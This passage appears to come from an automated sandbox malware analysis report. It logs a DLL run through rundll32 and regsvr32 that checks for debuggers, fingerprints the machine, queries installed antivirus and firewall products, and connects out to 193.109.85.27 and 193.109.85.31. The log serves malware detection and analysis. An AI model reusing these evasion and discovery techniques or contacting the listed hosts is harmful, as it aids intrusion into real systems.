Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h] 18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h] 18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBD5B0 mov edx, dword ptr fs:[00000030h] 18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h] 18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBE570 mov eax, dword ptr fs:[00000030h] 18_2_7EDBE570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED8C230 mov eax, dword ptr fs:[00000030h] 18_2_7ED8C230
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED87220 mov edx, dword ptr fs:[00000030h] 18_2_7ED87220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED87220 mov eax, dword ptr fs:[00000030h] 18_2_7ED87220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBE380 mov eax, dword ptr fs:[00000030h] 18_2_7EDBE380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBC340 mov eax, dword ptr fs:[00000030h] 18_2_7EDBC340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h] 18_2_7ED8E66B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64174 mov edx, dword ptr fs:[00000030h] 18_2_7ED64174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64174 mov ecx, dword ptr fs:[00000030h] 18_2_7ED64174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED67160 mov edx, dword ptr fs:[00000030h] 18_2_7ED67160
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h] 18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h] 18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h] 18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDBB130 mov eax, dword ptr fs:[00000030h] 18_2_7EDBB130
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBAF80 mov edx, dword ptr fs:[00000030h] 34_2_7EEBAF80
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC0DD0 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC0DD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE828BF mov edx, dword ptr fs:[00000030h] 34_2_7EE828BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBE860 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBE860
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h] 34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBB430 mov edx, dword ptr fs:[00000030h] 34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h] 34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h] 34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBE390 mov edx, dword ptr fs:[00000030h] 34_2_7EEBE390
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEA6330 mov ecx, dword ptr fs:[00000030h] 34_2_7EEA6330
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE86ED0 mov edx, dword ptr fs:[00000030h] 34_2_7EE86ED0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEF7EBB mov eax, dword ptr fs:[00000030h] 34_2_7EEF7EBB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEF7E46 mov eax, dword ptr fs:[00000030h] 34_2_7EEF7E46
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC7F60 mov edx, dword ptr fs:[00000030h] 34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC7F60 mov eax, dword ptr fs:[00000030h] 34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h] 34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEB9C60 mov eax, dword ptr fs:[00000030h] 34_2_7EEB9C60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE8BC30 mov edx, dword ptr fs:[00000030h] 34_2_7EE8BC30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE8BC30 mov eax, dword ptr fs:[00000030h] 34_2_7EE8BC30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE66DAA mov eax, dword ptr fs:[00000030h] 34_2_7EE66DAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE87DB0 mov eax, dword ptr fs:[00000030h] 34_2_7EE87DB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE66D10 mov eax, dword ptr fs:[00000030h] 34_2_7EE66D10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEDFA90 mov eax, dword ptr fs:[00000030h] 34_2_7EEDFA90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE87A60 mov edx, dword ptr fs:[00000030h] 34_2_7EE87A60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE86B80 mov edx, dword ptr fs:[00000030h] 34_2_7EE86B80
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEA4B90 mov ecx, dword ptr fs:[00000030h] 34_2_7EEA4B90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE66B00 mov edx, dword ptr fs:[00000030h] 34_2_7EE66B00
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE948E0 mov ecx, dword ptr fs:[00000030h] 34_2_7EE948E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE83992 mov edx, dword ptr fs:[00000030h] 34_2_7EE83992
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h] 34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64664 mov edx, dword ptr fs:[00000030h] 34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE79790 mov edx, dword ptr fs:[00000030h] 34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h] 34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBA730 mov eax, dword ptr fs:[00000030h] 34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h] 34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h] 34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBD5B0 mov edx, dword ptr fs:[00000030h] 34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h] 34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE8757D mov eax, dword ptr fs:[00000030h] 34_2_7EE8757D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBE570 mov eax, dword ptr fs:[00000030h] 34_2_7EEBE570
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE8C230 mov eax, dword ptr fs:[00000030h] 34_2_7EE8C230
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBE380 mov eax, dword ptr fs:[00000030h] 34_2_7EEBE380
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBC340 mov eax, dword ptr fs:[00000030h] 34_2_7EEBC340
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h] 34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE651EF mov ecx, dword ptr fs:[00000030h] 34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE651EF mov eax, dword ptr fs:[00000030h] 34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h] 34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE67160 mov edx, dword ptr fs:[00000030h] 34_2_7EE67160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64174 mov edx, dword ptr fs:[00000030h] 34_2_7EE64174
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64174 mov ecx, dword ptr fs:[00000030h] 34_2_7EE64174
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEBB130 mov eax, dword ptr fs:[00000030h] 34_2_7EEBB130
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h] 34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h] 34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h] 34_2_7EE64110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F35B5AE CreateMutexA,GetProcessHeap,lstrlenW,GetFocus,GetMenu,GetSubMenu,GetModuleHandleA,GetOEMCP,IsWow64Message,SetLastError,IsValidCodePage,GetModuleHandleA,lstrlenA,IsValidCodePage,GetLastError,lstrlenA,lstrlenW,IsValidCodePage,IsValidCodePage,GetFocus,GetSystemMenu,IsValidCodePage,CloseHandle,GetFocus,IsWindow,ArrangeIconicWindows, 14_2_7F35B5AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_6D0AAAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_6D0AAAFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_7F3D1B15
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_7F3D18C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_7F3D5753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_7EDE1B15
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_7EDE18C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_7EDE5753
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_6B86AAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_6B86AAFD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_7EEE1B15
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_7EEE18C7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_7EEE5753

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.109.85.27 443
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 193.109.85.31 54801
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE167C cpuid 18_2_7EDE167C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_7F3EAF2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_7F3EAB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_7F3EAA3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_7F3EAA89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 14_2_7F3E485C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 14_2_7F3EA79C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_7F3E42DF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_7F3EB100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 18_2_7EDFAF2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 18_2_7EDFAA89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 18_2_7EDFAA3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 18_2_7EDFAB24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 18_2_7EDF485C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 18_2_7EDFA79C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 18_2_7EDF42DF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 18_2_7EDFB100
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 34_2_7EEFAF2B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesW, 34_2_7EEFAA89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesW, 34_2_7EEFAA3E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesW, 34_2_7EEFAB24
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW, 34_2_7EEF485C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 34_2_7EEFA79C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesW, 34_2_7EEF42DF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 34_2_7EEFB100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE19E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 18_2_7EDE19E4
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct